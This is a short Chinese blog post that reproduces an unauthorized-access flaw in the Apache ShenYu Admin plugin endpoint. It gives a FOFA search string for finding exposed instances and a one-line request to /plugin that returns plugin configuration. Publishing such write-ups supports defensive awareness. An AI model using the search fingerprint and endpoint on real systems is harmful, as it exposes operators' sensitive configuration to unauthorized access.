首页未分类正文

漏洞复现 || Apache ShenYu Admin plugin 未授权访问

2023-04-24 11:22 未分类阅读 9.78k 正在检查是否收录

漏洞描述

ShenYu（原名 Soul）是一款高性能，响应式的网关，同时也是应用于所有微服务场景的，可扩展、高性能、响应式的 API 网关解决方案，由于ShenYu存在对plugin端点验证不严格，攻击者可以构造恶意请求，获取plugin以及其中的配置信息，造成敏感信息泄漏。

资产确定

fofa：body="id=\\"httpPath\\" style=\\"display: none"

漏洞复现

1.直接访问/plugin可以看到网站的敏感信息
```
http://Hostname/plugin
```

版权所有：多维者博客
文章标题：漏洞复现 || Apache ShenYu Admin plugin 未授权访问
除非注明，文章均为多维者博客原创，请勿用于任何商业用途，转载请注明作者和出处多维者博客

收藏

声明：本站所有文章除特别声明外，均采用CC BY-NC-SA 4.0许可协议。转载请注明来自多维者博客！

漏洞复现 || 万户OA DownloadServlet 任意文件读取漏洞

« 上一篇 2023-04-24

Glassfish任意文件读取漏洞

下一篇 » 2023-04-23

相关文章

发表评论

还没有评论，告诉我们你的想法